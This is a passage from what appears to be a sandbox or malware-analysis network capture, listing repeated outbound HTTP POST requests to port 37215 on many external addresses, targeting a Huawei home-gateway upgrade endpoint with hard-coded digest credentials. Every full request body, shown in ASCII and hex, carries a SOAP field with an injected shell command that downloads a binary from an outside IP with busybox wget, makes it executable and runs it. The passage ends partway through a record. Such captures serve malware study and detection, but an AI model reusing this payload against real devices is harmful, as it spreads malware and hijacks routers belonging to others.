                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19192.168.2.1553448156.251.203.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033107996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20192.168.2.1554546181.167.14.22137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033107996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21192.168.2.154003431.154.160.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033112049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22192.168.2.1545840190.235.37.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033202887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23192.168.2.1543966186.154.108.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033205986 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24192.168.2.1535680190.146.194.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033206940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25192.168.2.1555800181.213.144.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033209085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192.168.2.1536006102.232.214.10337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033224106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27192.168.2.154226094.25.107.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033262014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28192.168.2.1560442222.35.213.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033268929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29192.168.2.1552268157.27.135.13937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.033350945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
